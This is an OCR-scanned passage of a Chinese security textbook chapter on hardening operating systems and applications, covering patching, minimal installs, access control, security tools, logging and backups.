列 出 加 固 UNIX/Linux 系统 的 一 些 特定 方面 ; 
列 出 加 固 Windows 系统 的 一 些 特定 方面 ; 

列 出 在 虚拟 化 系统 中 维护 安全 所 需 的 步骤 。 


在 大 多 数组 织 中 ， 计 算 机 客户 端 和 服务 器 系统 是 IT 基础 设施 的 中 心 组 件 。 服 务 器 端 存储 
了 该 组 织 的 数据 和 应 用 ， 客 户 端 系统 可 以 对 这 些 数据 和 应 用 进行 访问 。 然 而 ， 正 如 在 第 6 章 和 
前 面 两 章 所 讨论 的 ， 大 多 数 大 规模 软件 系统 几乎 都 存在 一 些 安全 漏洞 。 尽 管 这 些 漏洞 仅仅 是 预 
期 存在 的 ， 我 们 通常 也 有 必要 对 这 些 软件 的 安装 和 运行 进行 管理 以 提供 合适 的 安全 等 级 。 在 某 
些 情形 下 ， 我 们 可 以 使 用 经 过 专门 设计 和 评估 的 系统 来 保证 安全 性 。 我 们 将 在 下 一 章 探讨 这 种 
可 能 性 。 

在 本 章 中 ， 我 们 主要 讨论 怎样 以 加 固 (hardening) 的 方式 来 保证 系统 安全 ， 这 个 加 固 的 过 
程 包括 操作 系统 和 关键 应 用 程序 的 规划 、 安 装 、 配 置 、 更 新 和 维护 。 这 些 方法 在 [SCAR08] 中 
有 详细 论述 。 我 们 首先 在 一 般 意义 上 介绍 操作 系统 和 关键 应 用 系统 的 加 固 过 程 ， 随 后 再 讨论 与 
Linux 系统 和 Windows 系统 相关 的 特定 方面 。 最 后 ， 会 讨论 一 下 虚拟 化 系统 的 加 固 ， 其 中 虚拟 
化 系统 指 的 是 多 个 虚拟 机 运行 在 同一 台 物 理 主机 上 的 情形 。 

如 图 12-1 所 示 ， 我 们 将 一 个 系统 看 作 由 若干 层 组 
成 ， 物 理 硬件 位 于 最 底层 ; 在 它 上 面 是 操作 系统 ， 包 含 
拥有 特权 的 内 核 代 码 、API 和 服务 ; 最 顶层 是 用 户 应 用 上 
程序 和 实用 组 件 。 这 张 图 也 展示 了 BIOS 和 其 他 代码 的 
存在 。 这 里 的 其 他 代码 指 的 是 在 操作 系统 内 核 的 外 部 ， 
对 于 操作 系统 内 核 来 说 是 不 可 见 的 ， 但 是 在 系统 启动 和 图 12-1 操作 系统 安全 分 层 
控制 底层 硬件 过 程 中 使 用 的 代码 。 这 些 层 中 的 每 一 层 代 
码 都 需要 适当 的 加 固 ( hardning) 措施 来 提供 合适 的 安全 服务 。 由 于 每 一 层 在 面 对 来 自 它 的 下 
层 的 攻击 时 都 是 脆弱 的 ， 因 此 只 对 底层 进行 适当 的 加 固 是 不 够 的 。 

许多 报告 指出 ， 使 用 少量 的 基本 加 固 措 施 就 能 抵御 大 量 近 几 年 已 知 的 攻击 。 自 从 2010 
年 澳大利亚 信和 号 董事 会 Australian Signals Directorate, ASD) 给 出 “35 条 缓解 策略 ” ( Top 35 
Mitigate Strategies) 以 来 ， 根 据 ASD 的 调查 发 现 ， 仅 仅 实施 这 些 策略 的 前 四 条 ， 就 可 以 阻止 至 
> 85% 的 有 目标 的 网 络 人 侵 。 因 此 ， 从 2013 年 开始 ， 这 前 四 条 策略 成 为 澳大利亚 所 有 政府 组 
织 的 强制 策略 。 这 四 条 策略 是 ; 
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1. 白 名 单 许可 的 应 用 。 

2. 给 第 三 方 应 用 和 操作 系统 漏洞 打 补 丁 。 

3. 限制 管理 员 的 权限 。 

4. 创建 深度 防御 系统 。 

在 本 章 中 ,我 们 会 讨论 这 四 条 以 及 其 他 ASD 列表 上 的 策略 。 需 要 注意 的 是 ， 这 些 策略 大 
部 分 可 以 在 由 美国 国土 安全 部 ( DHS)、 美 国 国家 安全 局 (NSA)、 能 源 部 门 、 美 国 系统 网 络 安 
全 协会 (SANS) 以 及 美国 其 他 部 门 共同 发 布 的 “20 条 关键 控制 ”20 Critical Controls) 中 找到 。 


12.1 操作 系统 安全 简介 


正如 前 面 所 提 到 的 ， 在 大 多 数组 织 中 ， 计 算 机 客户 端 系统 和 服务 器 系统 是 IT 基础 设施 的 
中 心 组 件 ， 这 些 系 统 可 能 存储 了 关键 的 数据 和 应 用 ， 是 组 织 正 常 运转 的 必要 工具 。 据 此 ， 我 们 
需要 注意 操作 系统 和 应 用 可 能 存在 的 漏洞 ， 以 及 6.3 节 所 讲 的 针对 此 类 漏洞 的 蠕虫 扫描 。 避 免 
系统 在 能 安装 最 新 的 补丁 和 实施 其 他 加 固 措 施 之 前 ， 在 安装 过 程 中 被 破坏 掉 。 因 此 ， 在 构建 和 
部 署 一 个 系统 时 就 应 该 有 一 个 预案 ， 以 应 对 这 类 威胁 ， 并 在 运行 生命 期 内 维护 系统 安全 。 

[SCAR08] 指出 ， 这 个 过 程 必 须 : 

© 评估 风险 和 规划 系统 部 署 ; 

© 加 固 系 统 底层 的 操作 系统 和 关键 应 用 程序 ; 

e 确保 任何 关键 内 容 是 安全 的 ; 

o 确保 使 用 了 合适 的 网 络 保护 机 制 ; 
o 确保 应 用 了 合适 的 流程 保证 系统 安全 。 

我 们 在 第 9 章 已 经 给 出 了 网 络 保护 机 制 的 可 选 方案 ， 因 此 在 本 章 我 们 将 讨论 其 余 几 项 
内 容 。 


12.2 ”系统 安全 规划 


部 署 新 系统 的 第 一 步 是 规划 。 仔 细 的 规划 将 有 助 于 确保 新 系统 尽 可 能 地 安全 ， 并 能 遵从 所 
有 必要 的 策略 。 这 份 规划 应 该 在 对 该 组 织 的 多 方面 的 评估 基础 上 形成 ， 因 为 每 个 组 织 有 其 特定 
的 安全 需求 和 关注 点 。 我 们 将 在 第 14 章 和 第 15 章 讨 论 更 为 宽泛 的 规划 过 程 。 

特定 系统 的 安装 规划 旨 在 以 最 小 的 代价 获得 最 大 化 的 安全 。 先 前 丰富 的 经 验 告 诉 我 们 ， 与 
在 开始 部 署 的 过 程 中 规划 和 提供 安全 性 相 比 ， 在 后 期 “改造 ”(retro-fit) 安全 性 会 更 加 困难 和 晶 
贵 。 在 规划 期 间 要 确定 系统 的 安全 需求 、 它 的 应 用 和 数据 以 及 系统 的 用 户 。 随 后 ， 这 些 内 容 会 
指导 对 操作 系统 和 应 用 所 需 软件 的 选取 ， 也 会 指导 确定 合适 的 用 户 配置 和 访问 控制 设置 ， 另 外 
也 有 助 于 其 他 加 固 措 施 的 选择 。 这 份 规划 还 需要 确定 合适 的 人 员 来 安装 和 管理 系统 ， 指 明 必 有 需 
的 相关 技能 以 及 所 需 的 培训 。 

[SCAR08] 列 出 了 在 系统 安全 规划 期 间 应 该 考虑 的 内 容 。 尽 管 它 所 关注 的 是 安全 服务 器 的 
部 署 ， 但 它 列 出 的 相关 内 容 也 非常 适用 于 客户 端 系统 的 设计 。 这 些 内 容 包括 以 下 方面 的 考虑 : 
系统 的 目的 、 存 储 的 信息 类 型 、 提 供 的 应 用 和 服务 以 及 它们 的 安全 需求 。 
系统 用 户 的 分 类 、 他 们 拥有 的 权限 ， 以 及 他 们 能 够 访问 的 信息 类 型 。 

用 户 怎样 获得 认证 。 

以 什么 方式 访问 系统 内 的 信息 应 该 被 监管 。 

© 系统 对 存储 在 其 他 主机 ， 如 文件 服务 器 或 数据 库 服务 器 上 的 信息 可 进行 什么 访问 ? 对 
这 些 访问 怎样 进行 管理 ? 
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© 谁 来 管理 系统 ， 他 们 将 以 什么 方式 管理 系统 (本 地 或 远程 访问 ) ? 
© 系统 需要 的 其 他 附加 安全 措施 ， 包 括 主机 防火 墙 、 反 病毒 软件 或 其 他 恶意 代码 防护 机 
制 ， 以 及 日 志 。 l 


12.3 ”操作 系统 加 固 


保证 系统 安全 的 第 一 个 关键 步骤 就 是 加 固 所 有 应 用 和 服务 所 依赖 的 基本 操作 系统 。 一 个 正 
确 安装 、 打 好 补丁 、 恰 当 配 置 的 操作 系统 是 良好 安全 性 的 基础 。 不 幸 的 是 ,许多 操作 系统 的 默 
认 配 置 通常 着 眼 于 让 使 用 最 为 便利 ， 而 并 非 让 系统 最 为 安全 。 更 重要 的 是 ， 因 为 每 个 组 织 都 有 
其 自身 的 安全 需求 ， 所 以 配置 也 会 随 着 组 织 的 不 同 而 不 同 。 正 如 我 们 刚刚 讨论 的 ， 一 个 特定 的 
系统 需要 哪些 东西 应 该 在 规划 阶段 确认 。 
尽管 保证 每 个 特定 操作 系统 安全 的 细节 各 不 相同 ， 但 广义 上 的 方法 却 是 类 似 的 。 针 对 大 多 
数 常见 操作 系统 的 安全 配置 手册 和 检查 清单 是 存在 的 ， 虽 然 这 些 手 册 和 清单 常常 因 每 个 组 织 和 
它们 的 系统 的 特殊 需求 而 变化 ， 但 依然 应 该 值得 去 参考 。 在 一 些 案例 中 ， 自 动 化 工具 也 有 可 能 
被 用 来 协助 加 固 系统 配置 工作 。 
在 加 固 操 作 系 统 的 过 程 中 ，[SCAR08] 建议 了 以 下 几 条 基本 步骤 : 
e 安装 操作 系统 并 打 补丁 。 
e 通过 以 下 几 点 来 加 固 和 配置 操作 系统 以 充分 解决 已 确认 的 安全 需求 : 
a 移 除 不 需要 的 服务 、 应 用 、 协 议 。 
a 配置 用 户 、 组 以 及 权限 。 
n 配置 资源 控制 。 
e 安装 和 配置 额外 的 安全 工具 ， 例 如 反 病 毒 软件 、 基 于 主机 的 防火 墙 、 入 侵 检测 系统 
(如 果 需 要 的 话 )。 
© 测试 基本 操作 系统 的 安全 性 ， 确 保 以 上 步 又 充分 满足 了 安全 需求 。 


12.3.1 操作 系统 安装 : 初始 安装 和 补丁 安装 


系统 安全 从 操作 系统 的 安装 开始 。 正 如 我 们 已 经 提 到 的 ， 一 个 有 网 络 连接 的 没 打 补丁 的 
系统 ， 在 它 的 安装 和 继续 使 用 阶段 是 脆弱 的 。 因 此 在 这 个 脆弱 阶段 ， 系 统 不 被 暴露 是 十 分 重要 
的 。 理 想 情 况 下 ， 新 系统 应 该 在 一 个 受 保护 的 网 络 环境 中 来 搭建 。 这 个 网 络 可 以 是 一 个 完全 
独立 的 网 络 ， 操 作 系 统 镜像 和 所 有 的 可 用 补丁 包 通 过 可 移动 的 媒介 传输 到 上 面 ， 这 些 可 移动 
的 媒介 包括 DVD 或 者 USB 驱动 程序 。 正 如 我 们 在 第 6 章 所 言 ， 恶 意 代码 可 以 通过 可 移动 设 
备 进行 传播 ， 因 此 ， 我 们 也 要 留心 确保 这 里 使 用 的 媒介 没有 被 感染 。 这 个 网 络 也 可 以 是 一 个 
访问 受 限 的 广域网 。 理 想 情 况 下 ， 系 统 应 该 没有 和 站 (inbound) 的 访问 权限 ， 仅 仅 有 几 条 出 站 
(outbound) 的 访问 权限 ， 用 来 连接 到 系统 安装 和 打 补 丁 所 需要 的 关键 站 点 。 无 论 何 种 情况 ， 全 
部 的 安装 和 加 固 过 程 应 该 在 系统 部 署 到 易 访问 且 脆 弱 的 位 置 之 前 完成 。 

初始 安装 应 该 仅 安装 系统 所 需 的 最 少 组 成 部 分 ， 并 且 仅 安装 系统 所 需 功能 的 相关 软件 包 。 
我 们 稍 后 会 探讨 最 少 软件 包 的 合理 性 问题 。 

系统 的 整体 引导 过 程 也 应 该 加 固 。 这 可 能 需要 在 系统 初始 引导 时 打开 某 些 BIOS 选项 ,或 
者 设 定 一 个 BIOS 更 改 密码 。 另 外 ， 可 能 还 需要 限制 可 以 引导 系统 开机 的 设备 。 正 如 我 们 在 
6.8 节 讨论 的 ， 这 对 阻止 攻击 者 通过 改变 开机 引导 过 程 来 安装 一 个 管理 软件 十 分 重要 ， 也 可 以 
阻止 其 通过 改变 引导 设备 来 绕 过 正常 的 系统 访问 控制 进而 访问 到 本 地 数据 。 我 们 随后 也 会 讲 
到 ， 加 密 文 件 系 统 的 使 用 也 可 以 应 对 这 类 威胁 。 
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在 随后 安装 任何 额外 设备 的 驱动 程序 时 也 应 该 十 分 小 心 ， 因 为 这 些 程序 通常 拥有 全 部 的 
内 核 访 问 权 限 ， 并 且 是 由 第 三 方 提供 的 。 这 些 驱 动 代码 的 完整 性 和 来 源 必须 经 过 仔细 验证 ， 以 
确保 其 拥有 较 高 的 信任 级 别 。 一 个 恶意 的 驱动 程序 可 以 绕 过 许多 安全 控制 来 安装 恶意 软件 ， 在 
6.8 节 讨 论 的 蓝 色 药 丸 (Blue Pill demonstration rootkit)， 以 及 在 6.3 节 讨 论 的 震 网 蠕虫 ( Stuxnet 
worm) 都 属于 此 类 情况 。 

考虑 到 操作 系统 和 应 用 中 常见 软件 相关 漏洞 和 其 他 漏洞 会 不 断 被 发 现 ， 因 此 系统 尽 可 能 保 
持 最 新 并 安装 与 安全 相关 的 补丁 包 也 是 十 分 关键 的 。 事 实 上 ， 这 样 做 也 是 符合 我 们 先前 提 到 的 
ASD 四 大 安全 策略 之 一 的 。 几 乎 所 有 常用 的 系统 现在 都 提供 自动 下 载 和 安装 安全 更 新 的 功能 。 
这 些 补丁 一 旦 可 用 ， 应 该 以 最 快 的 速度 安装 到 系统 中 。 

需要 注意 的 是 ， 在 变更 可 控 ( change-controlled) 的 系统 上 ， 不 应 该 运行 自动 更 新 ， 因 为 安 
全 补丁 也 会 引起 系统 的 不 稳定 ， 虽 然 这 种 情况 比较 少见 但 的 确 出 现 过 。 对 于 对 可 用 性 和 运行 时 
间 要 求 极 严格 的 系统 来 说 ， 应 该 在 测试 环境 下 安装 和 验证 全 部 补丁 ， 之 后 再 将 它们 部 署 到 生产 
环境 中 。 


12.3.2 ” 移 除 不 必要 的 服务 、 应 用 和 协议 


运行 在 系统 上 的 任何 软件 包 都 可 能 包含 漏洞 ， 所 以 可 以 运行 的 软件 包 越 少 ， 系 统 的 安全 风 
险 就 越 小 。 很 明显 ， 在 可 用 性 、 提 供 某 时 刻 所 需 的 全 部 软件 、 安 全 性 和 限制 软件 安装 数量 之 间 
存在 着 一 个 权衡 问题 。 不 同 组 织 之 间 ， 同 一 组 织 的 不 同系 统 之 间 所 需 的 服务 、 应 用 、 协 议 存在 
着 极 大 的 差别 。 因 此 在 系统 规划 阶段 应 该 明确 某 一 特定 系统 真正 需要 的 东西 ， 以 便 在 提供 合适 
的 功能 的 同时 ， 删 除 不 需要 的 软件 来 改善 安全 性 。 

大 多 数 分 布 式 系统 的 默认 配置 是 让 使 用 尽 可 能 便利 ， 而 并 非 系 统 尽 可 能 安全 。 因 此 ， 当 运 
行 初 始 安装 的 时 候 ， 不 应 该 使 用 系统 给 出 的 默认 安装 选项 ， 而 应 该 选择 个 性 化 安装 以 确保 仅 安 
装 需要 的 软件 。 如 果 在 随后 的 使 用 中 需要 其 他 的 软件 ， 那 么 到 时 候 再 按 需 安装 。[SCAR08] 和 
其 他 的 安全 加 固 指导 都 给 出 了 不 需要 安装 的 服务 、 应 用 和 协议 的 列表 。 

[SCAR08] 也 强烈 建议 不 安装 不 需要 的 软件 ， 而 并 非 先 安装 再 印 载 或 者 禁用 。 他 们 持 这 种 
观点 是 因为 他 们 发 现 许多 印 载 脚本 并 不 能 完全 删除 软件 包 的 所 有 组 件 。 他 们 也 注意 到 禁用 一 项 
服务 意味 着 仅 当 攻击 开始 的 时 候 该 服务 是 不 可 用 的 ， 如 果 攻 击 者 成 功 获取 了 访问 系统 的 某 些 权 
限 ， 那 么 被 禁用 的 软件 有 可 能 被 重新 启用 来 进一步 破坏 系统 。 所 以 对 于 安全 性 来 说 ， 最 好 的 办 
法 就 是 根本 不 安装 不 需要 的 软件 ， 这 样 软件 被 攻击 者 利用 就 无 从 谈 起 了 。 


12.3.3 配置 用 户 、 组 和 认证 


并 非 所 有 可 以 访问 系统 的 用 户 对 系统 内 的 数据 和 资源 都 拥有 相同 的 访问 权限 。 正 如 我 们 在 
第 4 章 所 讨论 的 ， 所 有 现代 操作 系统 都 实现 了 对 数据 和 资源 的 访问 控制 。 几 乎 所 有 的 系统 都 提 
供 某 些 形式 的 访问 控制 。 有 一 些 系统 也 可 能 提供 基于 角色 的 或 者 强制 的 访问 控制 机 制 。 

系统 规划 阶段 应 该 考虑 系统 用 户 的 分 类 、 他 们 各 自 拥有 的 权限 、 他 们 访问 信息 的 类 型 ， 以 
及 他 们 在 哪里 定义 和 认证 。 一 些 用 户 可 以 通过 提升 权限 来 管理 系统 ; 其 他 一 些 人 就 是 普通 用 
户 ， 对 于 所 需 的 文件 和 数据 拥有 适当 的 访问 权 ; 也 可 能 有 一 些 来 宾 账 户 ， 拥 有 十 分 有 限 的 访问 
权限 。 四 条 ASD 关键 策略 的 第 三 条 就 是 限制 提升 权限 ， 仅 仅 将 提升 权限 的 功能 开放 给 那些 需 
要 的 人 。 而且， 这 些 人 应 该 在 运行 需要 高 级 权限 的 任务 时 再 提升 权限 ， 而 在 其 他 时 候 以 普通 用 
户 的 身份 来 访问 系统 。 这 样 一 来 ， 攻 击 者 只 有 很 少 的 机 会 利用 特权 用 户 的 行为 来 攻击 系统 ， 从 
而 改善 系统 的 安全 性 。 一 些 操作 系统 也 提供 特殊 的 工具 和 访问 机 制 来 协助 管理 员 在 必要 时 提升 
自己 的 权限 ， 并 对 这 些 行为 进行 适当 的 记录 。 
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一 个 关键 的 决策 是 用 户 、 用 户 所 属 的 组 以 及 他 们 的 认证 方式 在 本 地 系统 被 指定 还 是 使 用 一 
个 中 央 认 证 服务 器 。 不 论 选 择 哪 一 种 ， 都 会 在 系统 中 有 详细 的 配置 。 

同样 在 这 个 阶段 ， 包 括 在 系统 安装 过 程 中 的 任何 默认 账户 都 应 该 被 加 固 。 那 些 不 需要 的 账 
户 或 者 删除 掉 ， 或 者 至 少 应 该 被 禁用 。 不 同 的 管理 服务 系统 账户 应 该 设 定 完好 ， 确 保 他 们 不 能 
互相 登录 。 另 外 ， 所 有 安装 过 程 中 的 默认 密码 都 应 该 被 更 改 以 确保 安全 。 

所 有 涉及 认证 证 书 ， 特 别 是 涉及 密码 安全 的 策略 都 应 该 进行 配置 。 这 包括 对 于 不 同 的 账户 
访问 方式 哪些 认证 方法 是 可 接受 的 ， 还 包括 密码 要 求 的 长 度 、 复 杂 度 、 时 效 。 我 们 在 第 3 章 讨 
论 了 这 些 话题 的 部 分 内 容 。 . 


12.3.4 配置 资源 控制 


一 且 确 定 了 用 户 和 用 户 组 ， 就 应 该 在 数据 和 资源 上 设 定 合适 的 访问 权限 来 匹配 特定 的 安全 
策略 。 这 可 能 会 限制 某 些 用 户 运行 某 些 程序 ， 特 别 是 修改 系统 状态 的 程序 ; 或 者 会 限制 那些 能 
读 写 某 些 特定 目录 树 的 用 户 。 许 多 安全 加 固 指导 都 给 出 了 对 默认 访问 配置 的 推荐 更 改 列 表 以 改 
422] 善 安 全 性 。 


12.3.5 ”安装 额外 的 安全 控制 工具 


安装 和 配置 额外 的 安全 工具 ， 比 如 反 病 毒 软件 、 基 于 主机 的 防火 墙 、IDS 或 IPS 软件 或 者 
应 用 程序 白 名 单 等 ， 可 能 会 进一步 地 改善 安全 性 。 这 些 工具 的 其 中 一 些 可 能 会 作为 操作 系统 的 
一 部 分 被 安装 ， 但 是 默认 状态 下 不 会 被 启用 。 其 他 的 则 是 需要 获取 和 使 用 的 第 三 方 产 品 。 

正如 我 们 在 第 6 章 讨论 的 ， 考 虑 到 恶意 软件 的 广泛 流行 ， 合 适 的 反 病 毒 软 件 (能 应 对 广泛 
的 病毒 类 型 ) 是 许多 系统 上 的 重要 安全 组 件 。 反 病毒 产品 传统 上 是 应 用 在 Windows 系统 中 的 ， 
这 是 因为 Windows 系统 的 广泛 应 用 使 它 成 为 攻击 者 的 首选 目标 。 然 而 ， 随 着 其 他 平台 的 使 用 
量 ， 特 别 是 智能 手机 的 使 用 量 的 增长 ， 使 得 更 多 的 病毒 针对 它们 而 开发 。 因 此 在 任何 系统 中 ， 
反 病 毒 产品 都 应 该 被 当 作 安全 防御 体系 的 一 部 分 。 

基于 主机 的 防火 墙 、IDS 和 IPS 软件 也 可 以 通过 限制 系统 上 的 远程 网 络 访问 来 改善 安全 
性 。 如 果 一 项 服务 本 地 可 以 访问 ， 而 远程 访问 是 不 需要 的 ， 那 么 这 种 限制 会 有 助 于 保证 系统 的 
安全 ， 以 防止 攻击 者 远程 利用 该 服务 。 传 统 上 ， 防 火 墙 通过 端口 和 协议 来 限制 某 些 或 全 部 的 外 
部 访问 。 一 些 防 火 墙 也 可 以 配置 成 允许 来 自 系统 或 到 指定 程序 的 访问 ， 这 可 以 进一步 限制 攻击 
者 ， 阻 止 其 安装 和 访问 其 自己 的 恶意 软件 。IDS 或 IPS 软件 可 能 会 包括 额外 的 机 制 ， 比 如 流量 
监控 或 者 文件 完整 性 检查 来 识别 甚至 应 对 某 些 类 别 的 攻击 。 

其 他 的 额外 工具 还 包括 白 名 单 。 这 限制 了 系统 中 能 运行 的 程序 ， 仅 仅 在 名 单 上 显 式 列 出 的 
程序 才 可 以 运行 。 这 种 工具 可 以 阻止 攻击 者 安装 和 运行 自己 的 恶意 软件 ， 并 且 这 也 是 ASD 四 
项 策略 中 的 第 一 个 。 尽 管 这 种 方法 可 以 提高 安全 性 ， 并 且 在 一 个 用 户 需求 可 预测 的 环境 中 表 
现 极 佳 ， 但 是 任何 软件 使 用 的 改变 都 会 导致 配置 的 改变 ， 这 会 引起 IT 支持 部 门 工作 量 的 增加 。 
注意 ,并 非 所 有 的 组 织 或 所 有 的 系统 都 适合 使 用 这 种 工具 。 


12.3.6 ”测试 系统 安全 性 


加 固 基本 操作 系统 的 最 后 一 步 就 是 安全 性 测试 。 其 目标 是 确保 先前 的 安全 配置 都 正确 实施 
了 ， 并 且 能 够 识别 应 该 被 修正 或 者 管理 的 任何 潜在 漏洞 。 
许多 安全 加 固 指导 都 包含 了 合适 的 检查 清单 。 也 有 经 过 专门 设计 的 程序 用 来 检查 系统 以 确 
保 系 统 符合 基本 的 安全 需求 ， 并 且 扫 描 已 知 的 漏洞 和 薄弱 的 配置 。 这 些 工作 应 该 在 系统 的 初始 
423] 加固 后 完成 ， 随 后 在 系统 的 安全 维护 过 程 中 周期 性 地 重复 。 
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12.4 ”应 用 安全 


一 旦 基本 操作 系统 安装 和 加 固 完毕 ， 接 下 来 就 要 安装 和 配置 所 需 的 服务 和 应 用 了 。 这 个 过 
程 与 先前 给 出 的 操作 系统 加 固 过 程 极其 相似 。 需 要 注意 的 是 ， 与 基本 操作 系统 类 似 ， 即 仅 安 装 
能 满足 功能 需求 的 软件 以 尽 可 能 减少 漏洞 。 需 要 特别 注意 提供 远程 访问 或 远程 服务 的 软件 ， 因 
为 攻击 者 可 能 利用 它们 来 获取 远程 访问 权限 。 因 此 ， 所 有 这 类 软件 都 应 该 谨慎 选择 和 配置 ， 并 
且 及 时 更 新 到 最 新 版 本 。 

系统 中 每 一 项 选 定 的 服务 和 应 用 都 应 该 先 安装 ， 随 后 打 好 最 新 的 补丁 。 这 些 补丁 可 能 由 操 
作 系 统 本 身 提供 ， 也 有 可 能 由 独立 的 第 三 方 软件 包 提供 。 至 于 基本 操作 系统 的 安装 ， 最 好 使 用 
一 个 独立 的 经 过 安全 加 固 的 网 络 。 


12.4.1 应 用 配置 


接 下 来 就 是 对 每 个 应 用 进行 特定 的 配置 。 这 包括 为 应 用 创建 和 指定 合适 的 数据 存储 区 域 ， 
根据 情况 适当 改变 应 用 和 服务 的 默认 配置 。 

一 些 应 用 和 服务 可 能 包含 默认 的 数据 、 脚 本 或 用 户 账户 。 这 些 东 西 应 该 被 仔细 检查 ,仅仅 
在 确实 需要 的 情况 下 予以 保留 ， 并且 做 适当 的 加 固 。 一 个 广为人知 的 例子 ， 就 是 在 Web 服务 
器 中 ， 通 常 存在 一 些 示例 脚本 ， 并 且 其 中 一 些 已 知 是 不 安全 的 。 这 些 脚 本 若 不 经 过 安全 加 固 处 
理 则 应 该 子 以 清除 。 

作为 配置 过 程 的 一 部 分 ， 应 该 仔细 考虑 应 用 所 具有 的 访问 权限 。 尤 其 是 像 Web 和 文件 传 
输 服务 这 样 的 远程 访问 服务 应 该 特别 注意 。 除 非 有 特别 的 需要 ， 否 则 这 种 服务 不 应 该 拥有 修改 
文件 的 权限 。 在 Web 和 文件 传输 服务 中 ， 一 个 常见 的 配置 错误 就 是 对 于 该 服务 下 的 所 有 文件 ， 
服务 器 都 拥有 执行 权限 。 这 样 做 的 后 果 ， 就 是 攻击 者 可 以 利用 某 些 软件 或 脚本 漏洞 ， 对 这 些 文 
件 进行 修改 。 大 量 的 Web 破坏 攻击 就 是 由 这 种 不 安全 的 配置 导致 的 。 通 过 确保 服务 器 对 大 多 
数 文件 只 能 读 、 不 能 写 ， 可 以 有 效 降低 出 现 这 类 攻击 的 风险 。 仅 对 于 那些 需要 修改 的 文件 ， 或 
是 需要 存储 上 传 的 数据 的 文件 ， 如 日 志 信息 文件 等 ， 给 予 其 写 权 限 。 并 且 仅 将 这 种 权限 给 予 负 
责 维护 这 类 信息 的 用 户 。 


12.4.2 MERR 


正如 我 们 在 第 2 章 和 第 四 、 五 部 分 所 讨论 的 ， 加 密 技术 是 在 传输 和 存储 过 程 中 保护 数据 的 
关键 技术 。 如 果 在 系统 中 需要 使 用 这 类 技术 ， 那 么 应 该 正确 配置 它们 ， 并 且 生 成 合适 的 密 钥 ， 
签名 并 加 固 。 

如 果 使 用 了 安全 网 络 服务 ， 那 么 该 服务 很 有 可 能 是 采用 了 TLS 或 者 IPSec， 这 时 应 该 为 它 
们 生成 合适 的 公 钥 和 私 钥 。 正 如 我 们 在 23.2 节 讨论 的 ， 随 后 会 由 认证 中 心 (CA) 来 创建 和 签 
发 X.509 证 书 ， 将 每 一 个 服务 身份 与 其 使 用 的 公 钥 相关 联 。 如 果 以 SSH 的 方式 提供 安全 的 远 
程 访问 服务 ， 那 么 应 该 构建 合适 的 服务 器 并 配置 客户 端 密 钥 。 

加 密 技术 的 另外 一 种 应 用 是 加 密 文 件 系统 。 如 果 想 用 这 种 系统 ， 就 应 该 创建 并 由 合适 的 密 
钥 保 证 其 安全 。 


12.5 ”安全 维护 


一 旦 系统 被 创建 ， 且 加 固 和 部 署 完 毕 ， 那 接 下 来 就 是 维护 其 安全 的 过 程 了 。 环 境 的 实时 改 
变 ， 新 漏洞 的 不 断 发 现 ， 都 会 导致 系统 暴露 在 威胁 之 下 。[SCAR08] 建议 的 安全 维护 流程 包括 
AFER: 
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o 监控 和 分 析 日 志 信 息 。 

。 定期 备份 。 

© 从 安全 损坏 中 恢复 。 

。 定期 测试 系统 安全 性 。 

© 使 用 合适 的 软件 维护 流程 来 更 新 所 有 的 关键 软件 并 安装 补丁 ， 同 时 根据 需要 监控 和 修 

改 相 关 配 置 。 

上 文 已 经 提 到 过 ， 如 果 有 可 能 ， 应 该 配置 自动 安装 补丁 和 更 新 ， 或 者 在 受 控 系统 中 ， 人 

工 测 试 和 安装 补丁 。 另 外 ， 系 统 应 该 定期 使 用 检查 清单 和 自动 化 工具 进行 检查 。 我 们 将 在 15.5 


” 节 讨论 突 发 事件 的 响应 。 下 面 介绍 关键 的 日 志和 备份 过 程 。 


12.5.1 日 志 


[SCAR08] 指出 ,“ 日 志 是 一 个 完善 的 安全 体系 的 基石 。” 日 志 是 一 个 仅 能 通知 你 发 生 了 什 
么 坏事 的 交互 工具 。 但 是 高 效 的 日 志 有 助 于 确保 系统 发 生 问题 后 ， 系 统管 理 员 可 以 迅速 和 准确 
地 定位 问题 并 且 高 效 地 整改 和 恢复 。 其 中 的 关键 在 于 确保 你 在 日 志 中 记录 了 正确 的 数据 ， 然 后 
能 够 监控 和 分 析 这 些 数据 。 日 志 信息 可 以 由 系统 、 网 络 以 及 应 用 来 生成 。 日 志 信息 记录 的 范围 
应 该 在 系统 规划 阶段 确定 好 ， 这 主要 取决 于 系统 的 安全 需求 和 服务 器 存储 的 信息 敏感 程度 。 

日 志 信息 非常 多 ， 因 此 为 它们 分 配 足 够 的 空间 十 分 重要 。 另 外 也 应 该 配置 日 志 自动 回 滚 
(log rotation) 功能 和 存档 系统 来 辅助 管理 日 志 信息 所 使 用 的 整体 空间 。 

人 工分 析 日 志 是 极其 乏味 的 并 且 十 分 不 可 靠 。 相 反 ， 使 用 某 些 形式 的 自动 分 析 才 是 首选 ， 
而 且 也 更 容易 发 现 异 常 活动 。 

我 们 将 在 第 18 章 深入 讨论 日 志 。 


12.5.2 ”数据 备份 和 存档 


定期 对 系统 进行 数据 备份 是 维护 系统 和 用 户 信息 完整 性 的 另 一 种 重要 方法 。 有 许多 因素 会 
导致 系统 中 的 信息 丢失 ， 包 括 硬 件 和 软件 的 故障 、 突 发 的 或 蓄意 的 损坏 。 另 外 在 数据 保持 方面 
也 有 法 律 和 运营 方面 的 要 求 。 备 份 ( backup) 指 的 是 定期 对 数据 进行 拷贝 的 过 程 ， 以 保证 数据 
在 丢失 或 者 损坏 后 ， 能 够 在 几 小 时 到 几 周 内 很 快 地 恢复 过 来 。 存 档 〈archive) 指 的 是 保存 过 去 
相当 长 的 一 段 时 间 内 ， 比 如 几 个 月 或 几 年 内 的 数据 拷贝 的 过 程 ， 这 是 为 了 符合 法 律 和 运营 对 能 
访问 过 去 数据 的 要 求 。 尽 管 不 同 组 织 有 不 同 的 需求 ， 但 这 两 个 过 程 一 般 是 连 在 一 起 的 。 

与 备份 和 存档 相关 的 需求 和 策略 应 该 在 系统 规划 阶段 确定 好 。 其 中 的 一 些 关 键 决 策 包括 备 
份 信息 是 在 线 保存 还 是 离线 保存 ， 本 地 保存 还 是 传输 到 远程 服务 器 中 。 需 要 在 实现 的 便利 性 、 
花费 同 应 对 威胁 时 的 安全 性 、 健 壮 性 之 间 做 出 权衡 。 

在 这 方面 缺乏 考虑 的 后 果 有 一 个 很 好 的 例子 ， 在 2011 年 年 初 ， 澳 大 利 亚 主机 提供 商 遭 遇 
了 攻击 ， 攻 击 者 不 仅 破坏 了 几 千 个 在 线 站 点 ， 同 时 也 破坏 了 它们 的 在 线 备 份 。 结 果 是 许多 没有 
